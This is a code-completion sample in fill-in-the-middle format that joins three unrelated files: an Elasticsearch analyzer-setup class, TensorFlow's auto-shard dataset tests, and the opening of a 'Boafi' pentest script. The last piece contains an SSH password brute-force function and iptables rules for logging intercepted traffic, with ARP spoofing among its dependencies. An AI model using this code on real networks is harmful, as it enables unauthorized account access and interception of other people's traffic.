indicesAnalysisService.tokenizerFactories().entrySet()) { String name = entry.getKey(); if (!tokenizers.containsKey(name)) { tokenizers.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!tokenizers.containsKey(name)) { tokenizers.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } this.tokenizers = ImmutableMap.copyOf(tokenizers); Map<String, CharFilterFactory> charFilters = newHashMap(); if (charFilterFactoryFactories != null) { Map<String, Settings> charFiltersSettings = indexSettings.getGroups("index.analysis.char_filter"); for (Map.Entry<String, CharFilterFactoryFactory> entry : charFilterFactoryFactories.entrySet()) { String charFilterName = entry.getKey(); CharFilterFactoryFactory charFilterFactoryFactory = entry.getValue(); Settings charFilterSettings = charFiltersSettings.get(charFilterName); if (charFilterSettings == null) { charFilterSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } CharFilterFactory tokenFilterFactory = charFilterFactoryFactory.create(charFilterName, charFilterSettings); charFilters.put(charFilterName, tokenFilterFactory); charFilters.put(Strings.toCamelCase(charFilterName), tokenFilterFactory); } } if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltCharFilterFactoryFactory> entry : indicesAnalysisService.charFilterFactories().entrySet()) { String name = entry.getKey(); if (!charFilters.containsKey(name)) { charFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!charFilters.containsKey(name)) { charFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } this.charFilters = ImmutableMap.copyOf(charFilters); Map<String, TokenFilterFactory> tokenFilters = newHashMap(); if (tokenFilterFactoryFactories != null) { Map<String, Settings> tokenFiltersSettings = indexSettings.getGroups("index.analysis.filter"); for (Map.Entry<String, TokenFilterFactoryFactory> entry : tokenFilterFactoryFactories.entrySet()) { String tokenFilterName = entry.getKey(); TokenFilterFactoryFactory tokenFilterFactoryFactory = entry.getValue(); Settings tokenFilterSettings = tokenFiltersSettings.get(tokenFilterName); if (tokenFilterSettings == null) { tokenFilterSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } TokenFilterFactory tokenFilterFactory = tokenFilterFactoryFactory.create(tokenFilterName, tokenFilterSettings); tokenFilters.put(tokenFilterName, tokenFilterFactory); tokenFilters.put(Strings.toCamelCase(tokenFilterName), tokenFilterFactory); } } // pre initialize the globally registered ones into the map if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltTokenFilterFactoryFactory> entry : indicesAnalysisService.tokenFilterFactories().entrySet()) { String name = entry.getKey(); if (!tokenFilters.containsKey(name)) { tokenFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!tokenFilters.containsKey(name)) { tokenFilters.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } this.tokenFilters = ImmutableMap.copyOf(tokenFilters); Map<String, AnalyzerProvider> analyzerProviders = newHashMap(); if (analyzerFactoryFactories != null) { Map<String, Settings> analyzersSettings = indexSettings.getGroups("index.analysis.analyzer"); for (Map.Entry<String, AnalyzerProviderFactory> entry : analyzerFactoryFactories.entrySet()) { String analyzerName = entry.getKey(); AnalyzerProviderFactory analyzerFactoryFactory = entry.getValue(); Settings analyzerSettings = analyzersSettings.get(analyzerName); if (analyzerSettings == null) { analyzerSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } AnalyzerProvider analyzerFactory = analyzerFactoryFactory.create(analyzerName, analyzerSettings); analyzerProviders.put(analyzerName, analyzerFactory); } } if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltAnalyzerProviderFactory> entry : indicesAnalysisService.analyzerProviderFactories().entrySet()) { String name = entry.getKey(); if (!analyzerProviders.containsKey(name)) { analyzerProviders.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } name = Strings.toCamelCase(entry.getKey()); if (!name.equals(entry.getKey())) { if (!analyzerProviders.containsKey(name)) { analyzerProviders.put(name, entry.getValue().create(name, ImmutableSettings.Builder.EMPTY_SETTINGS)); } } } } if (!analyzerProviders.containsKey("default")) { analyzerProviders.put("default", new StandardAnalyzerProvider(index, indexSettings, null, "default", ImmutableSettings.Builder.EMPTY_SETTINGS)); } if (!analyzerProviders.containsKey("default_index")) { analyzerProviders.put("default_index", analyzerProviders.get("default")); } if (!analyzerProviders.containsKey("default_search")) { analyzerProviders.put("default_search", analyzerProviders.get("default")); } if (!analyzerProviders.containsKey("default_search_quoted")) { analyzerProviders.put("default_search_quoted", analyzerProviders.get("default_search")); } Map<String, NamedAnalyzer> analyzers = newHashMap(); for (AnalyzerProvider analyzerFactory : analyzerProviders.values()) { if (analyzerFactory instanceof CustomAnalyzerProvider) { ((CustomAnalyzerProvider) analyzerFactory).build(this); } Analyzer analyzerF = analyzerFactory.get(); if (analyzerF == null) { throw new ElasticSearchIllegalArgumentException("analyzer [" + analyzerFactory.name() + "] created null analyzer"); } NamedAnalyzer analyzer; // if we got a named analyzer back, use it... if (analyzerF instanceof NamedAnalyzer) { analyzer = (NamedAnalyzer) analyzerF; } else { analyzer = new NamedAnalyzer(analyzerFactory.name(), analyzerFactory.scope(), analyzerF); } analyzers.put(analyzerFactory.name(), analyzer); analyzers.put(Strings.toCamelCase(analyzerFactory.name()), analyzer); String strAliases = indexSettings.get("index.analysis.analyzer." + analyzerFactory.name() + ".alias"); if (strAliases != null) { for (String alias : Strings.commaDelimitedListToStringArray(strAliases)) { analyzers.put(alias, analyzer); } } String[] aliases = indexSettings.getAsArray("index.analysis.analyzer." + analyzerFactory.name() + ".alias"); for (String alias : aliases) { analyzers.put(alias, analyzer); } } defaultAnalyzer = analyzers.get("default"); if (defaultAnalyzer == null) { throw new ElasticSearchIllegalArgumentException("no default analyzer configured"); } defaultIndexAnalyzer = analyzers.containsKey("default_index") ? analyzers.get("default_index") : analyzers.get("default"); defaultSearchAnalyzer = analyzers.containsKey("default_search") ? analyzers.get("default_search") : analyzers.get("default"); defaultSearchQuoteAnalyzer = analyzers.containsKey("default_search_quote") ? analyzers.get("default_search_quote") : defaultSearchAnalyzer; this.analyzers = ImmutableMap.copyOf(analyzers); } public void close() { for (NamedAnalyzer analyzer : analyzers.values()) { if (analyzer.scope() == AnalyzerScope.INDEX) { try { analyzer.close(); } catch (NullPointerException e) { // because analyzers are aliased, they might be closed several times // an NPE is thrown in this case, so ignore.... } catch (Exception e) { logger.debug("failed to close analyzer " + analyzer); } } } } public NamedAnalyzer analyzer(String name) { return analyzers.get(name); } public NamedAnalyzer defaultAnalyzer() { return defaultAnalyzer; } public NamedAnalyzer defaultIndexAnalyzer() { return defaultIndexAnalyzer; } public NamedAnalyzer defaultSearchAnalyzer() { return defaultSearchAnalyzer; } public NamedAnalyzer defaultSearchQuoteAnalyzer() { return defaultSearchQuoteAnalyzer; } public TokenizerFactory tokenizer(String name) { return tokenizers.get(name); } public CharFilterFactory charFilter(String name) { return charFilters.get(name); } public TokenFilterFactory tokenFilter(String name) { return tokenFilters.get(name); } }<|fim▁end|>
public AnalysisService(Index index, @IndexSettings Settings indexSettings, @Nullable IndicesAnalysisService indicesAnalysisService, @Nullable Map<String, AnalyzerProviderFactory> analyzerFactoryFactories,
<|file_name|>auto_shard_dataset_test.py<|end_file_name|><|fim▁begin|># Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for the private `_AutoShardDataset` transformation.""" import os from absl.testing import parameterized from tensorflow.core.example import example_pb2 from tensorflow.core.example import feature_pb2 from tensorflow.python.data.experimental.ops import cardinality from tensorflow.python.data.experimental.ops import distribute from tensorflow.python.data.experimental.ops import interleave_ops from tensorflow.python.data.experimental.ops import readers from tensorflow.python.data.experimental.ops import testing from tensorflow.python.data.experimental.ops import unique from tensorflow.python.data.kernel_tests import checkpoint_test_base from tensorflow.python.data.kernel_tests import test_base from tensorflow.python.data.kernel_tests import tf_record_test_base from tensorflow.python.data.ops import dataset_ops from tensorflow.python.data.ops import options as options_lib from tensorflow.python.data.ops import readers as core_readers from tensorflow.python.framework import combinations from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.lib.io import python_io from tensorflow.python.ops import parsing_ops from tensorflow.python.ops import string_ops from tensorflow.python.platform import test def chunk(l, n): for i in range(0, len(l), n): yield l[i:i + n] class AutoShardDatasetTest(tf_record_test_base.TFRecordTestBase, parameterized.TestCase): def setUp(self): super(AutoShardDatasetTest, self).setUp() self._num_files = 10 self._num_records = 10 self._filenames = self._createFiles() def getAllDatasetElements(self, dataset): actual = [] next_fn = self.getNext(dataset) while True: try: actual.append(self.evaluate(next_fn())) except errors.OutOfRangeError: break return actual def assertDatasetProducesWithShuffle(self, dataset, expected, batch, num_examples, shuffle): if shuffle: actual = [] next_fn = self.getNext(dataset) for _ in range(num_examples): elem = self.evaluate(next_fn()) if isinstance(elem, tuple): actual.extend(elem) else: actual.extend(elem.tolist()) self.assertCountEqual(actual, expected) with self.assertRaises(errors.OutOfRangeError): self.evaluate(next_fn()) else: self.assertDatasetProduces(dataset, list(chunk(expected, batch))) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testFlatMapReaderPipeline(self, shuffle): dataset = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (3, 8) for r in range(0, 10) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate( combinations.times(test_base.default_test_combinations(), combinations.combine(batch_size=[1, 3, 10]))) def testDatasetOfReaderDatasetsPipeline(self, batch_size): # This tests a scenario where a list_files main return multiple files # due to the glob containing wildcards. def batch(iterator, n): l = len(iterator) for i in range(0, l, n): yield iterator[i:min(i + n, l)] datasets = [] for files in batch(self._filenames, batch_size): datasets.append( dataset_ops.Dataset.list_files(files, shuffle=False).map( core_readers.TFRecordDataset)) dataset = dataset_ops.Dataset.from_tensor_slices(datasets) dataset = dataset.flat_map(lambda x: x) # Simulate additional ops in between flat_map and interleave. This should be # a no-op since if ShardDataset is placed right after flat_map, we will only # have two datasets left at this point. dataset = dataset.prefetch(1) dataset = dataset.prefetch(1) dataset = dataset.interleave( lambda x: x, cycle_length=1, num_parallel_calls=1) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (0, 5) for r in range(0, 10) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testZipReaderPipeline(self): dataset1 = dataset_ops.Dataset.list_files( self._filenames, shuffle=False) dataset1 = dataset1.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset2 = dataset_ops.Dataset.list_files( self._filenames, shuffle=False) dataset2 = dataset2.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset_ops.Dataset.zip((dataset1, dataset2)) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ (b"Record %d of file %d" % (r, f), b"Record %d of file %d" % (r, f)) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProduces(dataset, expected) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testConcatenateReaderPipeline(self, shuffle): dataset1 = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset1 = dataset1.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset1 = dataset1.batch(5) dataset2 = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset2 = dataset2.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset2 = dataset2.batch(5) dataset = dataset1.concatenate(dataset2) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] expected += expected self.assertDatasetProducesWithShuffle(dataset, expected, 5, 8, shuffle) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testPipelineWithMap(self, shuffle): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.map(lambda x: string_ops.substr_v2(x, 2, 1000)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"cord %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate(test_base.default_test_combinations()) def testDirectFilenameTFRecordReaderPipeline(self): dataset = core_readers.TFRecordDataset(self._filenames) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (0, 5) for r in range(0, 10) ] self.assertDatasetProduces(dataset, expected) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testValidPipelineWithRangeDataset(self, shuffle): dataset = dataset_ops.Dataset.range(self._num_files) dataset = dataset.map(lambda n: string_ops.string_join( # pylint:disable=g-long-lambda [self.get_temp_dir(), string_ops.string_format("/tf_record.{}.txt", [n])])) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.map(lambda x: string_ops.substr_v2(x, 2, 1000)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"cord %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(params=[(1, 0, 10, 10), (2, 1, 20, 5), (10, 1, 1, 10)]))) def testStandardReaderPipeline(self, params): num_epochs, index, batch_size, parallel_reads = params dataset = readers.make_tf_record_dataset( file_pattern=self._filenames, num_epochs=num_epochs, batch_size=batch_size, parser_fn=None, num_parallel_reads=parallel_reads, drop_final_batch=True, shuffle=False) dataset = distribute._AutoShardDataset(dataset, 2, index) outputs = self.getNext(dataset) self._verify_records( outputs, batch_size=batch_size, file_index=[i for i in range(index, self._num_records, 2)], num_epochs=num_epochs, interleave_cycle_length=parallel_reads,<|fim▁hole|> @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(shuffle=[True, False]))) def testSampleResNetPipeline(self, shuffle): dataset = dataset_ops.Dataset.list_files( self._filenames, shuffle=shuffle) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for r in range(0, 10) for f in (3, 8) ] self.assertDatasetProducesWithShuffle(dataset, expected, 5, 4, shuffle) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine(sharding_policy=[ options_lib.AutoShardPolicy.DATA, options_lib.AutoShardPolicy.AUTO ]))) def testShardByDataBeforePrefetch(self, sharding_policy): dataset = dataset_ops.Dataset.range(4) dataset = dataset.apply(testing.assert_next(["Shard", "Prefetch"])) dataset = dataset.prefetch(1) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = sharding_policy dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 2, 0) self.assertDatasetProduces(dataset, [0, 2]) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.times(combinations.combine( sharding_policy=[options_lib.AutoShardPolicy.DATA, options_lib.AutoShardPolicy.FILE]), combinations.combine(shuffle=[True, False])))) def testReplicateAndShardProduceDisjointData(self, shuffle, sharding_policy): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=shuffle) dataset = dataset.flat_map(core_readers.TFRecordDataset) graph_def = dataset._as_serialized_graph( strip_device_assignment=True, external_state_policy=options_lib.ExternalStatePolicy.WARN) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = sharding_policy ds1 = distribute._RemoteDataset(graph_def, "/device:CPU:0", dataset.element_spec) ds2 = distribute._RemoteDataset(graph_def, "/device:CPU:0", dataset.element_spec) ds1 = ds1.with_options(options) ds2 = ds2.with_options(options) ds1 = distribute._AutoShardDataset(ds1, 2, 0) ds2 = distribute._AutoShardDataset(ds2, 2, 1) elems1 = set(self.getAllDatasetElements(ds1)) elems2 = set(self.getAllDatasetElements(ds2)) self.assertEmpty(elems1.intersection(elems2)) @combinations.generate(test_base.default_test_combinations()) def testWorkersGreaterThanNumFilesWithDataSharding(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.DATA) dataset = core_readers._TFRecordDataset(self._filenames) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 5, 0) # Should return "Record (0,5) of file (0 --> 9)" since we are sharding by # individual elements, we should be able to get some data from all files. expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in (0, 5) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testAutoshardPolicyOff(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.OFF) dataset = core_readers._TFRecordDataset(self._filenames) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 5, 0) # Should return every record in every file since autosharding is turned off. expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in range(0, 10) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testFileShardingWithoutReaderDatasetOp(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.FILE) dataset = dataset_ops.Dataset.range(1024) dataset = dataset.with_options(options) # We are specifying that we want a file sharding policy, and this pipeline # doesn't start with file reading, so we should error out. with self.assertRaises(errors.NotFoundError): dataset = distribute._AutoShardDataset(dataset, 10, 0) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testWorkersGreaterThanNumFiles(self): dataset = dataset_ops.Dataset.list_files(self._filenames) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 500, 499) self.assertDatasetProduces(dataset, []) @combinations.generate(test_base.default_test_combinations()) def testTFRecordReaderWithDirectFileNames(self): # Using `_TFRecordDataset` creates a raw op rather than wrapping it around # a flat_map automatically. dataset = core_readers._TFRecordDataset(self._filenames) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in (0, 5) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testTFRecordReaderWithDirectFileNamesAndShapes(self): # Using `_TFRecordDataset` creates a raw op rather than wrapping it around # a flat_map automatically. dataset = core_readers._TFRecordDataset(self._filenames) # BatchDataset contains `output_types` and `output_shapes` dataset = dataset.batch(5) dataset = distribute._AutoShardDataset(dataset, 2, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in range(0, 5) ] self.assertDatasetProduces(dataset, list(chunk(expected, 5))) @combinations.generate(test_base.default_test_combinations()) def testShardOutOfRange(self): dataset = dataset_ops.Dataset.range(5) with self.assertRaises(errors.InvalidArgumentError): dataset = distribute._AutoShardDataset(dataset, 10, 0) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testShardOutOfRangeEmptyDataset(self): dataset = dataset_ops.Dataset.range(0) with self.assertRaises(errors.OutOfRangeError): dataset = distribute._AutoShardDataset(dataset, 10, 0) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testNoReaderPipelines(self): dataset = dataset_ops.Dataset.range(1024) dataset = distribute._AutoShardDataset(dataset, 2, 0) self.assertDatasetProduces(dataset, [i for i in range(1024) if i % 2 == 0]) @combinations.generate(test_base.default_test_combinations()) def testUnknownOpInPipelineStillShardsAtTheEnd(self): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.apply(unique.unique()) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in range(0, 10) for r in (0, 5) ] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testInvalidWorkerIndex(self): dataset = dataset_ops.Dataset.list_files(self._filenames) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) with self.assertRaises(errors.InvalidArgumentError): dataset = distribute._AutoShardDataset(dataset, 2, 2) self.evaluate(self.getNext(dataset)()) @combinations.generate(test_base.default_test_combinations()) def testAssertCardinality(self): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = dataset.apply(cardinality.assert_cardinality(42)) dataset = distribute._AutoShardDataset(dataset, 5, 0) expected = [ b"Record %d of file %d" % (r, f) # pylint:disable=g-complex-comprehension for f in (0, 5) for r in range(0, 10) ] self.assertDatasetProduces(dataset, list(chunk(expected, 5))) @combinations.generate(test_base.default_test_combinations()) def testMakeBatchedFeaturesDataset(self): files = 2 records_per_file = 5 def make_record(file_index): example = example_pb2.Example( features=feature_pb2.Features( feature={ "file": feature_pb2.Feature( int64_list=feature_pb2.Int64List(value=[file_index])), })) return example.SerializeToString() filenames = [] for file_index in range(files): filename = os.path.join(self.get_temp_dir(), "tf_record.%d.txt" % file_index) filenames.append(filename) writer = python_io.TFRecordWriter(filename) for _ in range(records_per_file): writer.write(make_record(file_index)) writer.close() dataset = readers.make_batched_features_dataset( file_pattern=filenames, batch_size=records_per_file, features={ "file": parsing_ops.FixedLenFeature([], dtypes.int64), }, reader=core_readers.TFRecordDataset, num_epochs=1) # We should shard at the file level, so that all records come from file 0. dataset = distribute._AutoShardDataset(dataset, 2, 0) dataset = dataset.unbatch() output = self.getDatasetOutput(dataset) files = [elem["file"] for elem in output] self.assertEqual(files, [0] * records_per_file) @combinations.generate(test_base.default_test_combinations()) def testHintShardingValidPattern(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.HINT) dataset = dataset_ops.Dataset.range(100).shard(distribute.SHARD_HINT, 0) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 10, 0) self.assertDatasetProduces(dataset, list(range(0, 100, 10))) @combinations.generate(test_base.default_test_combinations()) def testHintShardingInvalidPattern(self): options = options_lib.Options() options.experimental_distribute.auto_shard_policy = ( options_lib.AutoShardPolicy.HINT) dataset = dataset_ops.Dataset.range(100).shard(1, 0) dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 10, 0) self.assertDatasetProduces(dataset, list(range(100))) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.combine( auto_shard_policy=list(options_lib.AutoShardPolicy)))) def testEnumerateAutoShardPolicies(self, auto_shard_policy): """Verifies tf.data handles every auto-shard policy with no errors.""" dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = auto_shard_policy dataset = dataset.with_options(options) dataset = distribute._AutoShardDataset(dataset, 5, 3) self.getDatasetOutput(dataset, requires_initialization=True) class AutoShardWithRebatchDatasetTest(tf_record_test_base.TFRecordTestBase, parameterized.TestCase): def _setUpFiles(self, num_files, num_records_per_file): self._num_files = num_files self._num_records = num_records_per_file self._filenames = self._createFiles() @combinations.generate(test_base.default_test_combinations()) def testFileShardingWithLegacyRebatch(self): # Tests that RebatchDatasetV1 is a passthrough op. self._setUpFiles(num_files=5, num_records_per_file=10) dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( testing.assert_next(["Shard", "FlatMap", "Batch", "Rebatch"])) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = distribute._LegacyRebatchDataset(dataset, num_replicas=5) dataset = distribute._AutoShardDataset(dataset, 5, 3) expected = [[self._record(3, i)] for i in range(10)] self.assertDatasetProduces(dataset, expected) @combinations.generate(test_base.default_test_combinations()) def testFileShardingWithRebatch(self): # Tests that RebatchDatasetV2 is a passthrough op. self._setUpFiles(num_files=3, num_records_per_file=5) dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( testing.assert_next(["Shard", "FlatMap", "Batch", "Rebatch"])) dataset = dataset.flat_map(core_readers.TFRecordDataset) dataset = dataset.batch(5) dataset = distribute._RebatchDataset(dataset, batch_sizes=[2, 1, 2]) dataset = distribute._AutoShardDataset(dataset, 3, 1) expected = [[self._record(1, 0), self._record(1, 1)], [self._record(1, 2)], [self._record(1, 3), self._record(1, 4)]] self.assertDatasetProduces(dataset, expected) @combinations.generate( combinations.times( test_base.default_test_combinations(), combinations.times( combinations.combine(sharding_policy=[ options_lib.AutoShardPolicy.DATA, options_lib.AutoShardPolicy.AUTO ]), combinations.combine(with_prefetch=[True, False])))) def testUseLegacyRebatchWithDataSharding(self, sharding_policy, with_prefetch): # This test simulates a distributed environment with 3 workers, each with # 1 replica. dataset = dataset_ops.Dataset.range(8) dataset = dataset.batch(4) options = options_lib.Options() options.experimental_distribute.auto_shard_policy = sharding_policy dataset = dataset.with_options(options) # We expect the auto-shard rewrite to rewrite RebatchDatasetV2 to # RebatchDataset(V1) for correctness reasons. This will modify the output # of the dataset. worker_a_dataset = distribute._RebatchDataset( dataset, batch_sizes=[2, 1, 1]) if with_prefetch: worker_a_dataset = worker_a_dataset.prefetch(1) worker_a_dataset = distribute._AutoShardDataset( worker_a_dataset, 3, 0, num_replicas=3) expected = [[0, 1], [4, 5]] self.assertDatasetProduces(worker_a_dataset, expected) worker_b_dataset = distribute._RebatchDataset( dataset, batch_sizes=[1, 1, 2]) if with_prefetch: worker_b_dataset = worker_b_dataset.prefetch(1) worker_b_dataset = distribute._AutoShardDataset( worker_b_dataset, 3, 1, num_replicas=3) expected = [[2, 3], [6, 7]] self.assertDatasetProduces(worker_b_dataset, expected) worker_c_dataset = distribute._RebatchDataset( dataset, batch_sizes=[1, 2, 1]) if with_prefetch: worker_c_dataset = worker_c_dataset.prefetch(1) worker_c_dataset = distribute._AutoShardDataset( worker_c_dataset, 3, 2, num_replicas=3) expected = [[], []] self.assertDatasetProduces(worker_c_dataset, expected) class AutoShardDatasetCheckpointTest(tf_record_test_base.TFRecordTestBase, checkpoint_test_base.CheckpointTestBase, parameterized.TestCase): def setUp(self): super(AutoShardDatasetCheckpointTest, self).setUp() self._num_files = 10 self._num_records = 10 self._filenames = self._createFiles() @combinations.generate( combinations.times(test_base.default_test_combinations(), checkpoint_test_base.default_test_combinations())) def test(self, verify_fn): def build_dataset(): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = distribute._AutoShardDataset(dataset, 5, 3) return dataset verify_fn(self, build_dataset, num_outputs=20) if __name__ == "__main__": test.main()<|fim▁end|>
drop_final_batch=True, use_parser_fn=None) with self.assertRaises(errors.OutOfRangeError): self.evaluate(outputs())
<|file_name|>BoafiPenTest.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # -*- coding: utf-8 -*- ########## boafi Pentest script ########## - Perform various pentests automatically and save reports for further study ########## - Features/TODOs: Ipv6,DHCP,DNS,NTP,exploits,mitm.. ########## - Router bruteforce for easy guessable passwords ########## - Scan networks hosts and identify vulnerabilities ########## ... ### Author: Yessou Sami ### Project Boafi ## Dependencies: dsniff(arpspoof),paramiko(ssh bruteforce),iptables,scapy import os,time,argparse,random,paramiko,socket,logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * from datetime import datetime ## Functions def brute_pass(usr,passwd,ip,port): print "Trying for "+usr+" - "+passwd ssh=paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(ip,port,usr,passwd) print "Password is: ",passwd open("foundpass","a").write("IP: "+ip+" PORT: "+port+" USER: "+usr+" PASS: "+passwd) except paramiko.AuthenticationException: print("Bad Password - "+passwd) ssh.close() except socket.error: print("Failed connection") ssh.close() def EnaLogging(): os.popen("iptables -I FORWARD -p all -j LOG --log-prefix 'GENERAL-LOG-'") #Start Logging eve,ry connection to /var/log/messages #Log also images on /tmp? os.popen("iptables -I FORWARD -p all -m string --string 'jpg' --algo kmp -j LOG --log-prefix 'JPG-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'gif' --algo kmp -j LOG --log-prefix 'GIF-LOG-'") os.popen("iptables -I 